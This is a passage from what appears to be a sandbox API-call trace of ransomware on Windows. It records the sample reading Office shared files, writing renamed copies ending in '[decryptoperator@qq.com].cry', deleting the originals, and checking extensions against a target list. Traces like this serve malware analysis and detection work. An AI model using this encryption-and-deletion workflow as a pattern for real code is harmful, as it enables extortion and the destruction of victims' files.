lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.283] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.283] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0041.283] GetLastError () returned 0x0 [0041.283] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5061, lpOverlapped=0x0) returned 1 [0041.289] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5070, lpOverlapped=0x0) returned 1 [0041.291] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.291] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.291] SetEndOfFile (hFile=0x1cc) returned 1 [0041.291] CloseHandle (hObject=0x1cc) returned 1 [0041.292] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.292] SetEndOfFile (hFile=0x1bc) returned 1 [0041.292] CloseHandle (hObject=0x1bc) returned 1 [0041.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.293] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1 [0041.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.293] lstrlenW (lpString=".doc") returned 4 [0041.293] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.293] lstrlenW (lpString=".docx") returned 5 [0041.293] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.293] lstrlenW (lpString=".pdf") returned 4 [0041.293] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.293] lstrlenW (lpString=".xls") returned 4 [0041.293] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.293] lstrlenW (lpString=".xlsx") returned 5 [0041.293] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.293] lstrlenW (lpString=".ppt") returned 4 [0041.293] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.293] lstrlenW (lpString=".zip") returned 4 [0041.293] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.293] lstrlenW (lpString=".rar") returned 4 [0041.293] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.293] lstrlenW (lpString=".bz2") returned 4 [0041.293] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString=".7z") returned 3 [0041.294] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".dbf") returned 4 [0041.294] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".1cd") returned 4 [0041.294] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".jpg") returned 4 [0041.294] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".doc") returned 4 [0041.294] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString=".docx") returned 5 [0041.294] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.294] lstrlenW (lpString=".pdf") returned 4 [0041.294] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString=".xls") returned 4 [0041.294] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString=".xlsx") returned 5 [0041.294] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.294] lstrlenW (lpString=".ppt") returned 4 [0041.294] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".zip") returned 4 [0041.294] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.294] lstrlenW (lpString=".rar") returned 4 [0041.294] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString=".bz2") returned 4 [0041.294] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString=".7z") returned 3 [0041.294] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".dbf") returned 4 [0041.294] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.294] lstrlenW (lpString=".1cd") returned 4 [0041.294] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.295] lstrlenW (lpString=".jpg") returned 4 [0041.295] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.295] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.295] lstrlenW (lpString="VisiorWW.XML") returned 12 [0041.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.295] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=8723) returned 1 [0041.295] CloseHandle (hObject=0x1bc) returned 1 [0041.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 0x20 [0041.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.295] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.295] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0041.297] GetLastError () returned 0x0 [0041.297] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x2213, lpOverlapped=0x0) returned 1 [0041.572] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x2220, lpOverlapped=0x0) returned 1 [0041.573] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.573] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0041.573] SetEndOfFile (hFile=0x1cc) returned 1 [0041.573] CloseHandle (hObject=0x1cc) returned 1 [0041.574] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.574] SetEndOfFile (hFile=0x1bc) returned 1 [0041.574] CloseHandle (hObject=0x1bc) returned 1 [0041.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.575] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1 [0041.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.575] lstrlenW (lpString=".doc") returned 4 [0041.575] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.575] lstrlenW (lpString=".docx") returned 5 [0041.575] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.575] lstrlenW (lpString=".pdf") returned 4 [0041.575] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.575] lstrlenW (lpString=".xls") returned 4 [0041.575] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.575] lstrlenW (lpString=".xlsx") returned 5 [0041.575] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.575] lstrlenW (lpString=".ppt") returned 4 [0041.575] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.575] lstrlenW (lpString=".zip") returned 4 [0041.575] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.575] lstrlenW (lpString=".rar") returned 4 [0041.576] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".bz2") returned 4 [0041.576] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".7z") returned 3 [0041.576] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.576] lstrlenW (lpString=".dbf") returned 4 [0041.576] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.576] lstrlenW (lpString=".1cd") returned 4 [0041.576] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.576] lstrlenW (lpString=".jpg") returned 4 [0041.576] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.576] lstrlenW (lpString=".doc") returned 4 [0041.576] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".docx") returned 5 [0041.576] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.576] lstrlenW (lpString=".pdf") returned 4 [0041.576] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".xls") returned 4 [0041.576] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".xlsx") returned 5 [0041.576] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.576] lstrlenW (lpString=".ppt") returned 4 [0041.576] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.576] lstrlenW (lpString=".zip") returned 4 [0041.576] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.576] lstrlenW (lpString=".rar") returned 4 [0041.576] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".bz2") returned 4 [0041.576] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.576] lstrlenW (lpString=".7z") returned 3 [0041.576] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.577] lstrlenW (lpString=".dbf") returned 4 [0041.577] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.577] lstrlenW (lpString=".1cd") returned 4 [0041.577] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.577] lstrlenW (lpString=".jpg") returned 4 [0041.577] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.577] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.577] lstrlenW (lpString="DATES.XML") returned 9 [0041.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.578] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=8918) returned 1 [0041.578] CloseHandle (hObject=0x1bc) returned 1 [0041.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 0x20 [0041.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.578] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.578] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0042.478] GetLastError () returned 0x0 [0042.478] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x22d6, lpOverlapped=0x0) returned 1 [0042.650] WriteFile (in: hFile=0x178, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x22e0, lpOverlapped=0x0) returned 1 [0042.651] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0042.651] WriteFile (in: hFile=0x178, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.651] SetEndOfFile (hFile=0x178) returned 1 [0042.651] CloseHandle (hObject=0x178) returned 1 [0042.652] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.652] SetEndOfFile (hFile=0x1bc) returned 1 [0042.652] CloseHandle (hObject=0x1bc) returned 1 [0042.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.653] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1 [0042.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.653] lstrlenW (lpString=".doc") returned 4 [0042.653] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.653] lstrlenW (lpString=".docx") returned 5 [0042.653] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0042.653] lstrlenW (lpString=".pdf") returned 4 [0042.653] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.653] lstrlenW (lpString=".xls") returned 4 [0042.653] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.653] lstrlenW (lpString=".xlsx") returned 5 [0042.653] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0042.653] lstrlenW (lpString=".ppt") returned 4 [0042.653] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.653] lstrlenW (lpString=".zip") returned 4 [0042.653] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.653] lstrlenW (lpString=".rar") returned 4 [0042.653] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.653] lstrlenW (lpString=".bz2") returned 4 [0042.653] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.653] lstrlenW (lpString=".7z") returned 3 [0042.653] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.653] lstrlenW (lpString=".dbf") returned 4 [0042.653] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".1cd") returned 4 [0042.654] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".jpg") returned 4 [0042.654] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".doc") returned 4 [0042.654] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString=".docx") returned 5 [0042.654] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0042.654] lstrlenW (lpString=".pdf") returned 4 [0042.654] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString=".xls") returned 4 [0042.654] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString=".xlsx") returned 5 [0042.654] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0042.654] lstrlenW (lpString=".ppt") returned 4 [0042.654] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".zip") returned 4 [0042.654] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.654] lstrlenW (lpString=".rar") returned 4 [0042.654] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString=".bz2") returned 4 [0042.654] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString=".7z") returned 3 [0042.654] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".dbf") returned 4 [0042.654] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".1cd") returned 4 [0042.654] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0042.654] lstrlenW (lpString=".jpg") returned 4 [0042.654] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.655] lstrcmpiW (lpString1=".jpg", lpString2=".cry") returned 1 [0042.655] lstrlenW (lpString="Bears.jpg") returned 9 [0042.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.693] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1074) returned 1 [0042.694] CloseHandle (hObject=0x1bc) returned 1 [0042.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0042.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 